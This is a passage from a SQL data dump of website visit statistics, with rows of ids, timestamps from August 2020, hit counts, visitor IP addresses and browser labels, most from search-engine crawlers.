chrome'),(534252,1598066928,8,8,0,0,'109.108.71.11','other'),(534253,1598067144,1,1,0,0,'8.29.198.27','other'),(534254,1598068172,8,8,0,0,'109.108.71.11','other'),(534255,1598068590,2,2,0,0,'66.249.70.76','chrome'),(534256,1598068697,1,1,0,0,'5.45.207.174','other'),(534257,1598068967,1,1,0,0,'66.249.64.56','chrome'),(534258,1598069218,1,1,0,0,'66.249.64.60','chrome'),(534259,1598069373,8,8,0,0,'109.108.71.11','other'),(534260,1598069479,1,1,0,0,'207.46.13.182','other'),(534261,1598070045,1,1,0,0,'66.249.70.78','chrome'),(534262,1598070138,1,1,0,0,'66.249.64.60','chrome'),(534263,1598070482,1,1,0,0,'66.249.70.76','chrome'),(534264,1598070992,1,1,0,0,'131.220.6.152','chrome'),(534265,1598071045,1,1,0,0,'66.249.70.78','chrome'),(534266,1598071762,1,1,0,0,'66.249.70.76','chrome'),(534267,1598071935,8,8,0,0,'109.108.71.11','other'),(534268,1598072348,1,1,0,0,'66.249.70.80','chrome'),(534269,1598072368,1,1,0,0,'62.205.134.182','other'),(534270,1598072734,1,1,0,0,'66.249.64.56','chrome'),(534271,1598072740,1,1,0,0,'66.249.70.76','chrome'),(534272,1598073116,8,8,0,0,'109.108.71.11','other'),(534273,1598073413,1,1,0,0,'66.249.70.78','chrome'),(534274,1598074051,1,1,0,0,'66.249.70.76','chrome'),(534275,1598074156,1,1,0,0,'66.249.64.56','chrome'),(534276,1598074249,8,8,0,0,'109.108.71.11','other'),(534277,1598074791,2,2,0,0,'66.249.70.78','chrome'),(534278,1598074984,1,1,0,0,'5.255.253.136','other'),(534279,1598075377,8,8,0,0,'109.108.71.11','other'),(534280,1598076056,1,1,0,0,'66.249.70.76','chrome'),(534281,1598076057,2,2,0,0,'66.249.70.78','chrome'),(534282,1598076507,8,8,0,0,'109.108.71.11','other'),(534283,1598076620,1,1,0,0,'5.45.207.92','other'),(534284,1598076976,1,1,0,0,'5.255.253.136','other'),(534285,1598077312,1,1,0,0,'66.249.70.76','chrome'),(534286,1598077675,8,8,0,0,'109.108.71.11','other'),(534287,1598077763,1,1,0,0,'66.249.70.78','chrome'),(534288,1598077968,1,1,0,0,'8.29.198.26','other'),(534289,1598078327,1,1,0,0,'5.9.98.178','other'),(534290,1598078363,1,1,0,0,'66.249.70.76','chrome'),(534291,1598078548,1,1,0,0,'77.120.117.18','other'),(534292,1598078712,1,1,0,0,'157.55.39.55','other'),(534293,1598078895,8,8,0,0,'109.108.71.11','other'),(534294,1598079235,1,1,0,0,'5.9.98.178','other'),(534295,1598080102,8,8,0,0,'109.108.71.11','other'),(534296,1598080140,1,1,0,0,'5.9.98.178','other'),(534297,1598080332,2,2,0,0,'5.45.207.174','other'),(534298,1598080524,1,1,0,0,'66.249.64.60','chrome'),(534299,1598080666,1,1,0,0,'5.45.207.92','other'),(534300,1598081041,1,1,0,0,'5.9.98.178','other'),(534301,1598081310,8,8,0,0,'109.108.71.11','other'),(534302,1598081645,2,2,0,0,'5.45.207.92','other'),(534303,1598081943,1,1,0,0,'5.9.98.178','other'),(534304,1598082497,8,8,0,0,'109.108.71.11','other'),(534305,1598082844,1,1,0,0,'5.9.98.178','other'),(534306,1598083249,1,1,0,0,'66.102.9.179','chrome'),(534307,1598083732,8,8,0,0,'109.108.71.11','other'),(534308,1598083747,1,1,0,0,'5.9.98.178','other'),(534309,1598084648,1,1,0,0,'5.9.98.178','other'),(534310,1598084927,8,8,0,0,'109.108.71.11','other'),(534311,1598086097,8,8,0,0,'109.108.71.11','other'),(534312,1598086474,1,1,0,0,'5.255.253.69','other'),(534313,1598087300,8,8,0,0,'109.108.71.11','other'),(534314,1598087333,1,1,0,0,'5.45.207.174','other'),(534315,1598087342,1,1,0,0,'66.249.70.80','chrome'),(534316,1598087372,1,1,0,0,'66.249.70.76','chrome'),(534317,1598088186,1,1,0,0,'66.249.70.78','chrome'),(534318,1598088499,8,8,0,0,'109.108.71.11','other'),(534319,1598088803,1,1,0,0,'8.29.198.27','other'),(534320,1598089073,1,1,0,0,'157.55.39.114','other'),(534321,1598089111,1,1,0,0,'207.46.13.249','other'),(534322,1598089435,1,1,0,0,'5.255.253.136','other'),(534323,1598089612,1,1,0,0,'207.46.13.41','other'),(534324,1598089788,8,8,0,0,'109.108.71.11','other'),(534325,1598090301,1,1,0,0,'66.249.70.78','chrome'),(534326,1598090945,8,8,0,0,'109.108.71.11','other'),(534327,1598091173,1,1,0,0,'207.46.13.134','other'),(534328,1598091722,2,2,0,0,'178.154.200.28','other'),(534329,1598092101,8,8,0,0,'109.108.71.11','other'),(534330,1598092742,1,1,0,0,'66.249.70.76','chrome'),(534331,1598092857,1,1,0,0,'66.249.70.80','chrome'),(534332,1598093247,8,8,0,0,'109.108.71.11','other'),(534333,1598093786,2,2,0,0,'5.45.207.174','other'),(534334,1598093810,2,2,0,0,'66.249.70.80','chrome'),(534335,1598093859,1,1,0,0,'66.249.70.76','chrome'),(534336,1598093966,1,1,0,0,'66.249.70.78','chrome'),(534337,1598094392,8,8,0,0,'109.108.71.11','other'),(534338,1598095260,1,1,0,0,'207.46.13.11','other'),(534339,1598095356,1,1,0,0,'207.46.13.134','other'),(534340,1598095556,8,8,0,0,'109.108.71.11','other'),(534341,1598096129,1,1,0,0,'5.45.207.174','other'),(534342,1598096574,1,1,0,0,'207.46.13.249','other'),(534343,1598096660,1,1,0,0,'109.74.154.72','chrome'),(534344,1598096723,8,8,0,0,'109.108.71.11','other'),(534345,1598097002,1,1,0,0,'157.55.39.167','other'),(534346,1598097087,2,2,0,0,'157.55.39.131','other'),(534347,1598097133,1,1,0,0,'45.131.7.9','chrome'),(534348,1598097924,8,8,0,0,'109.108.71.11','other'),(534349,1598098639,1,1,0,0,'157.55.39.226','other'),(534350,1598098760,1,1,0,0,'207.46.13.182','other'),(534351,1598099121,8,8,0,0,'109.108.71.11','other'),(534352,1598099634,1,1,0,0,'8.29.198.26','other'),(534353,1598099735,1,1,0,0,'66.249.70.76','chrome'),(534354,1598100320,8,8,0,0,'109.108.71.11','other'),(534355,1598101207,1,1,0,0,'207.46.13.124','other'),(534356,1598101499,8,8,0,0,'109.108.71.11','other'),(534357,1598101514,1,1,0,0,'207.46.13.72','other'),(534358,1598102765,8,8,0,0,'109.108.71.11','other'),(534359,1598102807,13,13,0,0,'82.165.253.73','other'),(534360,1598103289,1,1,0,0,'188.190.250.120','other'),(534361,1598103742,14,14,0,0,'82.165.253.73','other'),(534362,1598103763,1,1,0,0,'66.249.70.76','chrome'),(534363,1598103779,1,1,0,0,'178.154.200.2','other'),(534364,1598103976,8,8,0,0,'109.108.71.11','other'),(534365,1598104085,1,1,0,0,'66.249.70.78','chrome'),(534366,1598104353,1,1,0,0,'5.45.207.92','other'),(534367,1598104466,1,1,0,0,'5.255.253.183','other'),(534368,1598104645,17,17,0,0,'82.165.253.73','other'),(534369,1598105257,8,8,0,0,'109.108.71.11','other'),(534370,1598105557,3,3,0,0,'82.165.253.73','other'),(534371,1598106444,1,1,0,0,'37.73.87.144','chrome'),(534372,1598106469,8,8,0,0,'109.108.71.11','other'),(534373,1598106532,1,1,0,0,'66.249.64.60','chrome'),(534374,1598107261,1,1,0,0,'207.46.13.72','other'),(534375,1598107697,8,8,0,0,'109.108.71.11','other'),(534376,1598108199,1,1,0,0,'157.55.39.167','other'),(534377,1598108286,1,0,1,0,'66.249.70.80',''),(534378,1598108896,8,8,0,0,'109.108.71.11','other'),(534379,1598109322,1,1,0,0,'157.55.39.145','other'),(534380,1598109371,1,1,0,0,'66.249.70.80','chrome'),(534381,1598109399,2,2,0,0,'66.249.70.78','chrome'),(534382,1598110079,8,8,0,0,'109.108.71.11','other'),(534383,1598110232,3,3,0,0,'51.83.216.203','other'),(534384,1598110467,1,1,0,0,'8.29.198.27','other'),(534385,1598110653,1,1,0,0,'157.55.39.131','other'),(534386,1598110673,1,1,0,0,'66.249.70.80','chrome'),(534387,1598110696,1,1,0,0,'66.249.70.78','chrome'),(534388,1598110705,2,2,0,0,'66.249.70.76','chrome'),(534389,1598110749,7,7,0,0,'178.154.200.28','other'),(534390,1598110822,6,6,0,0,'5.45.207.92','other'),(534391,1598110828,1,1,0,0,'213.180.203.250','other'),(534392,1598110831,6,6,0,0,'5.45.207.174','other'),(534393,1598110947,3,3,0,0,'178.154.200.80','other'),(534394,1598111018,2,2,0,0,'178.154.200.74','other'),(534395,1598111064,2,2,0,0,'5.255.253.170','other'),(534396,1598111271,8,8,0,0,'109.108.71.11','other'),(534397,1598111597,1,1,0,0,'66.249.64.58','chrome'),(534398,1598112010,1,1,0,0,'66.249.70.80','chrome'),(534399,1598112218,1,1,0,0,'66.249.64.60','chrome'),(534400,1598112487,8,8,0,0,'109.108.71.11','other'),(534401,1598112673,2,2,0,0,'66.249.70.76','chrome'),(534402,1598112934,1,1,0,0,'157.55.39.167','other'),(534403,1598113589,2,2,0,0,'66.249.64.60','chrome'),(534404,1598113632,2,2,0,0,'66.249.70.80','chrome'),(534405,1598113701,8,8,0,0,'109.108.71.11','other'),(534406,1598113713,1,1,0,0,'5.45.207.174','other'),(534407,1598114906,9,9,0,0,'109.108.71.11','other'),(534408,1598115186,1,1,0,0,'69.171.251.22','other'),(534409,1598116116,1,1,0,0,'5.255.253.69','other'),(534410,1598116392,8,8,0,0,'109.108.71.11','other'),(534411,1598117097,1,1,0,0,'178.154.200.28','other'),(534412,1598117864,9,9,0,0,'109.108.71.11','other'),(534413,1598119059,9,9,0,0,'109.108.71.11','other'),(534414,1598119085,1,1,0,0,'157.55.39.226','other'),(534415,1598120520,1,1,0,0,'2.92.60.107','chrome'),(534416,1598120558,16,16,0,0,'109.108.71.11','other'),(534417,1598121209,1,1,0,0,'66.249.70.80','chrome'),(534418,1598121241,1,1,0,0,'178.154.200.28','other'),(534419,1598121300,1,1,0,0,'8.29.198.26','other'),(534420,1598121864,1,1,0,0,'109.108.71.11','other'),(534421,1598122366,1,1,0,0,'66.249.64.56','chrome'),(534422,1598122820,8,8,0,0,'109.108.71.11','other'),(534423,1598123385,1,1,0,0,'5.45.207.174','other'),(534424,1598123440,1,1,0,0,'157.55.39.145','other'),(534425,1598123987,8,8,0,0,'109.108.71.11','other'),(534426,1598125134,8,8,0,0,'109.108.71.11','other'),(534427,1598125198,1,1,0,0,'207.46.13.11','other'),(534428,1598125721,1,1,0,0,'157.55.39.145','other'),(534429,1598125733,1,1,0,0,'207.46.13.249','other'),(534430,1598126170,1,1,0,0,'66.249.70.80','chrome'),(534431,1598126328,8,8,0,0,'109.108.71.11','other'),(534432,1598127193,2,2,0,0,'207.46.13.249','other'),(534433,1598127287,1,0,1,0,'66.249.70.78',''),(534434,1598127310,1,0,1,0,'66.249.70.80',''),(534435,1598127498,8,8,0,0,'109.108.71.11','other'),(534436,1598127609,1,1,0,0,'207.46.13.11','other'),(534437,1598128016,1,1,0,0,'66.249.64.60','chrome'),(534438,1598128375,1,1,0,0,'66.249.70.76','chrome'),(534439,1598128706,8,8,0,0,'109.108.71.11','other'),(534440,1598128744,1,1,0,0,'66.249.70.78','chrome'),(534441,1598129021,1,1,0,0,'5.45.207.75','other'),(534442,1598129861,8,8,0,0,'109.108.71.11','other'),(534443,1598130540,1,1,0,0,'157.55.39.73','other'),(534444,1598131043,8,8,0,0,'109.108.71.11','other'),(534445,1598131070,1,1,0,0,'66.249.70.78','chrome'),(534446,1598131501,1,1,0,0,'5.45.207.174','other'),(534447,1598131887,1,1,0,0,'66.249.64.56','chrome'),(534448,1598132123,1,1,0,0,'8.29.198.25','other'),(534449,1598132158,8,8,0,0,'109.108.71.11','other'),(534450,1598132221,1,1,0,0,'154.51.131.142','chrome'),(534451,1598132662,1,1,0,0,'178.154.200.28','other'),(534452,1598133284,8,8,0,0,'109.108.71.11','other'),(534453,1598133544,2,2,0,0,'34.217.67.56','other'),(534454,1598133949,1,1,0,0,'157.55.39.73','other'),(534455,1598134313,1,1,0,0,'5.45.207.174','other'),(534456,1598134384,8,8,0,0,'109.108.71.11','other'),(534457,1598135139,2,2,0,0,'66.249.70.80','chrome'),(534458,1598135211,1,1,0,0,'5.255.253.136','other'),(534459,1598135515,8,8,0,0,'109.108.71.11','other'),(534460,1598136702,8,8,0,0,'109.108.71.11','other'),(534461,1598136889,1,1,0,0,'66.249.70.80','chrome'),(534462,1598137849,8,8,0,0,'109.108.71.11','other'),(534463,1598138483,1,1,0,0,'66.249.70.78','chrome'),(534464,1598138631,2,2,0,0,'66.249.70.80','chrome'),(534465,1598138998,8,8,0,0,'109.108.71.11','other'),(534466,1598139006,1,1,0,0,'18.224.190.5','chrome'),(534467,1598139829,1,1,0,0,'207.46.13.11','other'),(534468,1598140137,8,8,0,0,'109.108.71.11','other'),(534469,1598140243,1,1,0,0,'207.46.13.72','other'),(534470,1598140507,1,1,0,0,'62.205.134.182','other'),(534471,1598140752,1,1,0,0,'66.249.70.78','chrome'),(534472,1598140985,1,1,0,0,'5.45.207.174','other'),(534473,1598141298,8,8,0,0,'109.108.71.11','other'),(534474,1598141394,2,2,0,0,'66.249.64.56','chrome'),(534475,1598141644,1,1,0,0,'66.249.64.58','chrome'),(534476,1598141676,7,7,0,0,'66.249.70.76','chrome'),(534477,1598141714,3,3,0,0,'66.249.70.78','chrome'),(534478,1598141913,1,1,0,0,'66.249.70.80','chrome'),(534479,1598142006,2,2,0,0,'207.46.13.72','other'),(534480,1598142471,8,8,0,0,'109.108.71.11','other'),(534481,1598142818,1,1,0,0,'66.249.64.60','chrome'),(534482,1598142946,1,1,0,0,'8.29.198.27','other'),(534483,1598143381,1,1,0,0,'5.255.253.183','other'),(534484,1598143624,8,8,0,0,'109.108.71.11','other'),(534485,1598144121,3,3,0,0,'139.99.236.202','chrome'),(534486,1598144241,2,2,0,0,'5.45.207.174','other'),(534487,1598144245,1,1,0,0,'5.45.207.174','chrome'),(534488,1598144247,1,1,0,0,'5.45.207.135','chrome'),(534489,1598144249,1,1,0,0,'213.180.203.250','chrome'),(534491,1598144250,1,1,0,0,'5.255.253.151','chrome'),(534493,1598144251,1,1,0,0,'178.154.200.60','chrome'),(534496,1598144252,1,1,0,0,'213.180.203.38','chrome'),(534498,1598144253,1,1,0,0,'5.45.207.153','chrome'),(534499,1598144254,1,1,0,0,'5.255.253.115','chrome'),(534500,1598144391,1,1,0,0,'66.249.70.76','chrome'),(534501,1598144746,8,8,0,0,'109.108.71.11','other'),(534502,1598145073,1,1,0,0,'178.154.200.32','other'),(534503,1598145386,2,2,0,0,'66.249.70.78','chrome'),(534504,1598145667,2,2,0,0,'157.55.39.145','other'),(534505,1598145919,8,8,0,0,'109.108.71.11','other'),(534506,1598146131,2,2,0,0,'66.249.70.76','chrome'),(534507,1598146203,1,1,0,0,'157.55.39.73','other'),(534508,1598146377,1,1,0,0,'178.154.200.28','other'),(534509,1598146786,1,1,0,0,'5.45.207.174','other'),(534510,1598146953,1,1,0,0,'66.249.64.56','chrome'),(534511,1598147045,8,8,0,0,'109.108.71.11','other'),(534512,1598147147,1,1,0,0,'66.249.70.76','chrome'),(534513,1598147419,1,1,0,0,'66.249.70.80','chrome'),(534514,1598148051,3,3,0,0,'66.249.70.78','chrome'),(534515,1598148141,8,8,0,0,'109.108.71.11','other'),(534516,1598148445,2,2,0,0,'66.249.70.80','chrome'),(534517,1598148656,1,1,0,0,'66.249.70.76','chrome'),(534518,1598149033,1,1,0,0,'5.255.253.88','other'),(534519,1598149134,1,1,0,0,'34.245.66.213','chrome'),(534520,1598149270,8,8,0,0,'109.108.71.11','other'),(534521,1598149760,3,3,0,0,'66.249.70.80','chrome'),(534522,1598149829,2,2,0,0,'66.249.70.76','chrome'),(534523,1598150016,4,4,0,0,'66.249.70.78','chrome'),(534524,1598150376,8,8,0,0,'109.108.71.11','other'),(534525,1598150653,1,1,0,0,'66.249.64.58','chrome'),(534526,1598150819,4,4,0,0,'66.249.70.80','chrome'),(534527,1598151256,1,1,0,0,'157.55.39.226','other'),(534528,1598151291,2,2,0,0,'66.249.70.78','chrome'),(534529,1598151474,3,3,0,0,'66.249.70.76','chrome'),(534530,1598151476,8,8,0,0,'109.108.71.11','other'),(534531,1598151930,2,2,0,0,'66.249.70.80','chrome'),(534532,1598152120,1,1,0,0,'157.55.39.145','other'),(534533,1598152524,1,1,0,0,'82.117.80.90','chrome'),(534534,1598152575,2,2,0,0,'66.249.64.58','chrome'),(534535,1598152626,8,8,0,0,'109.108.71.11','other'),(534536,1598152713,1,1,0,0,'66.249.64.60','chrome'),(534537,1598152980,4,4,0,0,'66.249.70.78','chrome'),(534538,1598153039,4,4,0,0,'66.249.70.76','chrome'),(534539,1598153163,1,1,0,0,'66.249.64.56','chrome'),(534540,1598153262,2,2,0,0,'5.45.207.174','other'),(534541,1598153269,1,1,0,0,'5.255.253.183','other'),(534542,1598153415,1,1,0,0,'207.46.13.182','other'),(534543,1598153493,2,2,0,0,'66.249.70.80','chrome'),(534544,1598153614,1,1,0,0,'207.46.13.249','other'),(534545,1598153750,8,8,0,0,'109.108.71.11','other'),(534546,1598153774,1,1,0,0,'8.29.198.26','other'),(534547,1598153783,1,1,0,0,'66.249.64.60','chrome'),(534548,1598153955,1,1,0,0,'66.249.70.78','chrome'),(534549,1598154199,1,1,0,0,'66.249.64.56','chrome'),(534550,1598154873,8,8,0,0,'109.108.71.11','other'),(534551,1598154897,3,3,0,0,'66.249.70.78','chrome'),(534552,1598154954,2,2,0,0,'66.249.70.76','chrome'),(534553,1598155480,3,3,0,0,'66.249.70.80','chrome'),(534554,1598155754,1,1,0,0,'5.45.207.127','other'),(534555,1598155816,1,1,0,0,'66.249.64.58','chrome'),(534556,1598156020,8,8,0,0,'109.108.71.11','other'),(534557,1598156294,5,5,0,0,'66.249.70.76','chrome'),(534558,1598156604,1,1,0,0,'66.249.64.56','chrome'),(534559,1598156784,4,4,0,0,'66.249.70.78','chrome'),(534560,1598156971,1,1,0,0,'66.249.64.58','chrome'),(534561,1598157251,1,1,0,0,'131.220.6.152','chrome'),(534562,1598157343,4,4,0,0,'66.249.70.76','chrome'),(534563,1598157382,1,1,0,0,'213.159.213.137','other'),(534564,1598157803,2,2,0,0,'66.249.70.78','chrome'),(534565,1598157954,1,1,0,0,'66.249.64.60','chrome'),(534566,1598158242,5,5,0,0,'66.249.70.80','chrome'),(534567,1598158258,1,1,0,0,'157.55.39.226','other'),(534568,1598158462,1,1,0,0,'66.249.70.76','chrome'),(534569,1598158588,2,2,0,0,'66.249.64.58','chrome'),(534570,1598158723,1,1,0,0,'62.205.134.182','other'),(534571,1598159257,8,8,0,0,'109.108.71.11','other'),(534572,1598159284,2,2,0,0,'66.249.70.80','chrome'),(534573,1598159482,1,1,0,0,'178.154.200.28','other'),(534574,1598159530,4,4,0,0,'66.249.70.78','chrome'),(534575,1598159777,2,2,0,0,'66.249.70.76','chrome'),(534576,1598160054,1,1,0,0,'5.45.207.174','other'),(534577,1598160110,1,1,0,0,'66.249.64.60','chrome'),(534578,1598160455,8,8,0,0,'109.108.71.11','other'),(534579,1598160608,1,1,0,0,'66.249.70.80','chrome'),(534580,1598160700,1,1,0,0,'66.249.70.76','chrome'),(534581,1598161673,8,8,0,0,'109.108.71.11','other'),(534582,1598161796,3,3,0,0,'66.249.70.80','chrome'),(534583,1598161819,4,4,0,0,'66.249.70.78','chrome'),(534584,1598162245,1,1,0,0,'66.249.64.60','chrome'),(534585,1598162661,2,2,0,0,'66.249.70.76','chrome'),(534586,1598162723,1,1,0,0,'66.249.64.56','chrome'),(534587,1598162782,1,0,1,0,'66.249.70.78',''),(534588,1598162928,8,8,0,0,'109.108.71.11','other'),(534589,1598163511,1,1,0,0,'178.154.200.28','other'),(534590,1598163567,2,2,0,0,'66.249.70.78','chrome'),(534591,1598163570,1,0,1,0,'66.249.70.76',''),(534592,1598163726,5,5,0,0,'66.249.70.76','chrome'),(534593,1598163855,3,3,0,0,'66.249.70.80','chrome'),(534594,1598164206,8,8,0,0,'109.108.71.11','other'),(534595,1598164291,1,1,0,0,'66.249.64.60','chrome'),(534596,1598164599,1,1,0,0,'8.29.198.26','other'),(534597,1598165207,3,3,0,0,'66.249.70.76','chrome'),(534598,1598165419,8,8,0,0,'109.108.71.11','other'),(534599,1598165582,1,1,0,0,'66.249.70.80','chrome'),(534600,1598165720,3,3,0,0,'66.249.70.78','chrome'),(534601,1598165764,1,1,0,0,'66.249.64.56','chrome'),(534602,1598165826,1,1,0,0,'66.249.64.60','chrome'),(534603,1598166139,3,3,0,0,'136.243.94.124','other'),(534604,1598166603,8,8,0,0,'109.108.71.11','other'),(534605,1598167373,1,1,0,0,'66.249.64.58','chrome'),(534606,1598167386,1,1,0,0,'66.249.64.56','chrome'),(534607,1598167812,8,8,0,0,'109.108.71.11','other'),(534608,1598168192,1,1,0,0,'157.55.39.145','other'),(534609,1598168572,1,1,0,0,'66.249.64.60','chrome'),(534610,1598168961,8,8,0,0,'109.108.71.11','other'),(534611,1598169126,1,1,0,0,'5.45.207.174','other'),(534612,1598169278,1,1,0,0,'88.155.32.190','chrome'),(534613,1598169822,1,1,0,0,'66.249.64.60','chrome'),(534614,1598169958,1,1,0,0,'66.249.70.76','chrome'),(534615,1598170111,8,8,0,0,'109.108.71.11','other'),(534616,1598170209,1,1,0,0,'66.249.64.56','chrome'),(534617,1598171303,8,8,0,0,'109.108.71.11','other'),(534618,1598172267,1,1,0,0,'5.255.253.183','other'),(534619,1598172479,8,8,0,0,'109.108.71.11','other'),(534620,1598172578,1,1,0,0,'207.46.13.249','other'),(534621,1598173153,1,1,0,0,'66.249.70.76','chrome'),(534622,1598173722,8,8,0,0,'109.108.71.11','other'),(534623,1598174157,1,1,0,0,'66.249.70.78','chrome'),(534624,1598174472,1,1,0,0,'66.249.70.76','chrome'),(534625,1598174921,8,8,0,0,'109.108.71.11','other'),(534626,1598175416,1,1,0,0,'8.29.198.25','other'),(534627,1598175448,1,1,0,0,'66.249.64.60','chrome'),(534628,1598175459,2,2,0,0,'91.196.178.163','chrome'),(534629,1598176122,8,8,0,0,'109.108.71.11','other'),(534630,1598176233,1,1,0,0,'207.46.13.72','other'),(534631,1598177306,8,8,0,0,'109.108.71.11','other'),(534632,1598177847,1,1,0,0,'66.249.70.76','chrome'),(534633,1598178175,1,1,0,0,'5.45.207.92','other'),(534634,1598178468,8,8,0,0,'109.108.71.11','other'),(534635,1598178473,1,1,0,0,'207.46.13.70','other'),(534636,1598179485,1,1,0,0,'66.249.70.78','chrome'),(534637,1598179672,8,8,0,0,'109.108.71.11','other'),(534638,1598180892,8,8,0,0,'109.108.71.11','other'),(534639,1598181070,1,1,0,0,'66.249.70.80','chrome'),(534640,1598181291,1,1,0,0,'207.46.13.249','other'),(534641,1598181317,1,1,0,0,'109.74.154.72','chrome'),(534642,1598181649,3,3,0,0,'136.243.94.124','other'),(534643,1598181938,1,1,0,0,'66.249.70.78','chrome'),(534644,1598182101,8,8,0,0,'109.108.71.11','other'),(534645,1598182234,1,0,1,0,'137.116.137.157',''),(534646,1598182946,1,1,0,0,'66.249.70.80','chrome'),(534647,1598183351,8,8,0,0,'109.108.71.11','other'),(534648,1598184060,1,1,0,0,'157.55.39.167','other'),(534649,1598184640,8,8,0,0,'109.108.71.11','other'),(534650,1598184852,1,1,0,0,'66.249.64.60','chrome'),(534651,1598185002,1,1,0,0,'46.211.50.196','chrome'),(534652,1598185559,1,1,0,0,'157.55.39.145','other'),(534653,1598185769,1,1,0,0,'66.249.70.78','chrome'),(534654,1598185849,8,8,0,0,'109.108.71.11','other'),(534655,1598186240,1,1,0,0,'8.29.198.25','other'),(534656,1598186287,1,1,0,0,'66.249.64.58','chrome'),(534657,1598187042,8,8,0,0,'109.108.71.11','other'),(534658,1598187308,1,1,0,0,'207.46.13.249','other'),(534659,1598187535,1,1,0,0,'66.249.64.58','chrome'),(534660,1598188011,1,1,0,0,'157.55.39.145','other'),(534661,1598188220,8,8,0,0,'109.108.71.11','other'),(534662,1598189037,1,1,0,0,'178.154.200.32','chrome'),(534663,1598189412,8,8,0,0,'109.108.71.11','other'),(534664,1598189557,1,1,0,0,'157.55.39.226','other'),(534665,1598190576,8,8,0,0,'109.108.71.11','other'),(534666,1598190921,1,1,0,0,'66.102.9.179','chrome'),(534667,1598190941,1,1,0,0,'5.45.207.174','other'),(534668,1598191366,1,1,0,0,'207.46.13.11','other'),(534669,1598191758,8,8,0,0,'109.108.71.11','other'),(534670,1598192184,1,1,0,0,'207.46.13.96','other'),(534671,1598192980,8,8,0,0,'109.108.71.11','other'),(534672,1598193326,1,1,0,0,'66.249.70.78','chrome'),(534673,1598193952,1,1,0,0,'5.255.253.115','other'),(534674,1598194195,8,8,0,0,'109.108.71.11','other'),(534675,1598195114,1,1,0,0,'46.133.9.228','chrome'),(534676,1598195165,5,5,0,0,'106.75.22.46','msie'),(534677,1598195224,1,1,0,0,'106.75.22.46','other'),(534678,1598195358,8,8,0,0,'109.108.71.11','other'),(534679,1598196529,8,8,0,0,'109.108.71.11','other'),(534680,1598197061,1,1,0,0,'8.29.198.26','other'),(534681,1598197507,1,1,0,0,'5.45.207.174','other'),(534682,1598197675,8,8,0,0,'109.108.71.11','other'),(534683,1598197811,1,1,0,0,'157.55.39.226','other'),(534684,1598198410,1,1,0,0,'207.46.13.11','other'),(534685,1598198803,8,8,0,0,'109.108.71.11','other'),(534686,1598199929,8,8,0,0,'109.108.71.11','other'),(534687,1598200980,2,2,0,0,'91.196.178.124','chrome'),(534688,1598201043,8,8,0,0,'109.108.71.11','other'),(534689,1598201203,1,1,0,0,'94.153.74.184','chrome'),(534690,1598201586,1,1,0,0,'5.255.253.183','other'),(534691,1598201648,1,1,0,0,'178.154.200.60','other'),(534692,1598201786,1,1,0,0,'66.249.70.78','chrome'),(534693,1598202145,8,8,0,0,'109.108.71.11','other'),(534694,1598202157,1,1,0,0,'178.154.200.28','other'),(534695,1598203286,8,8,0,0,'109.108.71.11','other'),(534696,1598203607,1,1,0,0,'207.46.13.11','other'),(534697,1598203776,1,1,0,0,'178.154.200.28','other'),(534698,1598204128,1,1,0,0,'176.36.31.181','chrome'),(534699,1598204271,1,1,0,0,'66.249.70.80','chrome'),(534700,1598204280,8,8,0,0,'109.108.71.11','other'),(534701,1598204473,1,1,0,0,'62.210.113.228','firefox'),(534702,1598204999,1,1,0,0,'31.13.115.111','other'),(534703,1598205001,1,1,0,0,'31.13.115.120','other'),(534704,1598205332,8,8,0,0,'109.108.71.11','other'),(534705,1598206254,1,1,0,0,'66.249.70.80','chrome'),(534706,1598206352,8,8,0,0,'109.108.71.11','other'),(534707,1598206777,1,1,0,0,'207.46.13.70','other'),(534708,1598207521,1,1,0,0,'207.46.13.11','other'),(534709,1598207577,1,0,1,0,'66.249.70.80',''),(534710,1598207606,8,8,0,0,'109.108.71.11','other'),(534711,1598207883,1,1,0,0,'8.29.198.27','other'),(534712,1598207968,1,1,0,0,'66.249.70.78','chrome'),(534713,1598208061,1,1,0,0,'66.249.70.76','chrome'),(534714,1598208870,8,8,0,0,'109.108.71.11','other'),(534715,1598208998,1,1,0,0,'138.246.253.15','chrome'),(534716,1598210160,8,8,0,0,'109.108.71.11','other'),(534717,1598211375,8,8,0,0,'109.108.71.11','other'),(534718,1598211535,1,1,0,0,'207.46.13.190','other'),(534719,1598211745,1,1,0,0,'207.46.13.72','other'),(534720,1598212549,8,8,0,0,'109.108.71.11','other'),(534721,1598212602,1,1,0,0,'66.249.70.78','chrome'),(534722,1598212642,1,1,0,0,'159.65.166.179','other'),(534723,1598213793,8,8,0,0,'109.108.71.11','other'),(534724,1598214995,8,8,0,0,'109.108.71.11','other'),(534725,1598215903,1,1,0,0,'66.249.70.76','chrome'),(534726,1598216190,8,8,0,0,'109.108.71.11','other'),(534727,1598216334,1,1,0,0,'157.55.39.145','other'),(534728,1598216631,1,1,0,0,'66.249.70.78','chrome'),(534729,1598217013,1,1,0,0,'134.19.179.235','firefox'),(534730,1598217357,1,1,0,0,'207.46.13.11','other'),(534731,1598217391,8,8,0,0,'109.108.71.11','other'),(534732,1598218171,2,2,0,0,'66.249.70.78','chrome'),(534733,1598218610,8,8,0,0,'109.108.71.11','other'),(534734,1598218698,1,1,0,0,'8.29.198.27','other'),(534735,1598218962,1,1,0,0,'207.46.13.11','other'),(534736,1598219604,1,1,0,0,'207.46.13.190','other'),(534737,1598219792,8,8,0,0,'109.108.71.11','other'),(534738,1598220090,1,1,0,0,'66.249.70.80','chrome'),(534739,1598220553,1,1,0,0,'5.45.207.75','other'),(534740,1598220758,1,1,0,0,'207.46.13.11','other'),(534741,1598221022,8,8,0,0,'109.108.71.11','other'),(534742,1598221160,1,1,0,0,'213.180.203.75','other'),(534743,1598221672,2,2,0,0,'66.249.70.76','chrome'),(534744,1598222037,1,1,0,0,'66.249.70.80','chrome'),(534745,1598222207,1,1,0,0,'207.46.13.249','other'),(534746,1598222275,8,8,0,0,'109.108.71.11','other'),(534747,1598222445,1,1,0,0,'66.249.70.78','chrome'),(534748,1598223186,1,1,0,0,'207.46.13.190','other'),(534749,1598223421,8,8,0,0,'109.108.71.11','other'),(534750,1598223684,1,1,0,0,'66.249.70.80','chrome'),(534751,1598224679,8,8,0,0,'109.108.71.11','other'),(534752,1598224688,1,1,0,0,'89.136.116.202','other'),(534753,1598224930,1,1,0,0,'88.155.143.160','other'),(534754,1598224968,1,1,0,0,'157.55.39.73','other'),(534755,1598225056,3,3,0,0,'66.249.70.76','chrome'),(534756,1598225418,7,7,0,0,'148.100.244.123','firefox'),(534757,1598225433,1,1,0,0,'66.249.70.78','chrome'),(534758,1598225502,2,2,0,0,'94.130.9.183','other'),(534759,1598225665,1,1,0,0,'157.55.39.145','other'),(534760,1598225876,1,1,0,0,'66.249.70.80'